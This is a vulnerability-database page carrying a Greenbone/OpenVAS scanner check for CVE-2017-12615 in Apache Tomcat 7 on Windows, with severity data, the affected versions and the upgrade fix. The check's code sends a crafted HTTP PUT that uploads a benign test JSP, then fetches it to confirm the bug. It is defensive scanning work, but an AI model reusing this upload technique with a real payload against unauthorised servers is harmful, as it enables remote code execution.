Apache Tomcat 'HTTP PUT Request' Code Execution Vulnerability - Windows
🗓️ 25 Sep 2017 00:00:00Reported by Copyright (C) 2017 Greenbone AGType
openvas🔗 plugins.openvas.org👁 56 Views
10
| Source | Link |
|---|---|
| tomcat | www.tomcat.apache.org/security-7.html |
| securityfocus | www.securityfocus.com/bid/100901 |
| cisa | www.cisa.gov/known-exploited-vulnerabilities-catalog |
| securitytracker | www.securitytracker.com/id/1039392 |
# SPDX-FileCopyrightText: 2017 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:apache:tomcat";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.811845");
script_version("2024-07-17T05:05:38+0000");
script_xref(name:"CISA", value:"Known Exploited Vulnerability (KEV) catalog");
script_xref(name:"URL", value:"https://www.cisa.gov/known-exploited-vulnerabilities-catalog");
script_cve_id("CVE-2017-12615");
script_tag(name:"cvss_base", value:"6.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
script_tag(name:"last_modification", value:"2024-07-17 05:05:38 +0000 (Wed, 17 Jul 2024)");
script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2024-07-16 17:58:22 +0000 (Tue, 16 Jul 2024)");
script_tag(name:"creation_date", value:"2017-09-25 17:29:27 +0530 (Mon, 25 Sep 2017)");
script_tag(name:"qod_type", value:"exploit");
script_name("Apache Tomcat 'HTTP PUT Request' Code Execution Vulnerability - Windows");
script_tag(name:"summary", value:"Apache Tomcat is prone to a code execution vulnerability.");
script_tag(name:"vuldetect", value:"Send a crafted 'HTTP PUT' request and check
whether it is able to upload arbitrary file or not.");
script_tag(name:"insight", value:"The flaw is due to an insufficient processing
of 'HTTP PUT Request', which allows uploading of an arbitrary JSP file to the
target system and then request the file to execute arbitrary code on the target
system.");
script_tag(name:"impact", value:"Successful exploitation will allow remote
attackers to execute arbitrary code on the target system.");
script_tag(name:"affected", value:"Apache Tomcat versions 7.0.0 to 7.0.79 on Windows");
script_tag(name:"solution", value:"Upgrade to Tomcat version 7.0.81 or later.");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name:"URL", value:"http://www.securitytracker.com/id/1039392");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/100901");
script_xref(name:"URL", value:"http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.81");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2017 Greenbone AG");
script_family("Web Servers");
script_dependencies("gb_apache_tomcat_consolidation.nasl", "os_detection.nasl");
script_mandatory_keys("apache/tomcat/http/detected", "Host/runs_windows");
script_require_ports("Services/www", 8080);
exit(0);
}
include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");
if(!port = get_app_port(cpe:CPE, service:"www"))
exit(0);
if(!get_app_location(cpe:CPE, port:port, nofork:TRUE))
exit(0);
host = http_host_name(port:port);
postData = '<% out.println("Reproducing CVE-2017-12615");%>';
vtstrings = get_vt_strings();
rand = "/" + vtstrings["lowercase_rand"] + '.jsp';
url = rand + "/";
req = string("PUT ", url, " HTTP/1.1\r\n",
"Host: ", host, "\r\n",
"Content-Length: ", strlen(postData), "\r\n",
"\r\n", postData);
res = http_keepalive_send_recv(port:port, data:req);
if(res =~ "^HTTP/1\.[01] 201")
{
if( http_vuln_check(port:port, url:rand, pattern:"Reproducing CVE-2017-12615", check_header:TRUE))
{
report = 'It was possible to upload the file ' + rand + '. Please delete this file manually.\n\n';
security_message(port:port, data:report);
exit(0);
}
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jul 2024 00:00Current
7.9High risk
Vulners AI Score7.9
CVSS 26.8
CVSS 3.18.1
EPSS0.99607
SSVC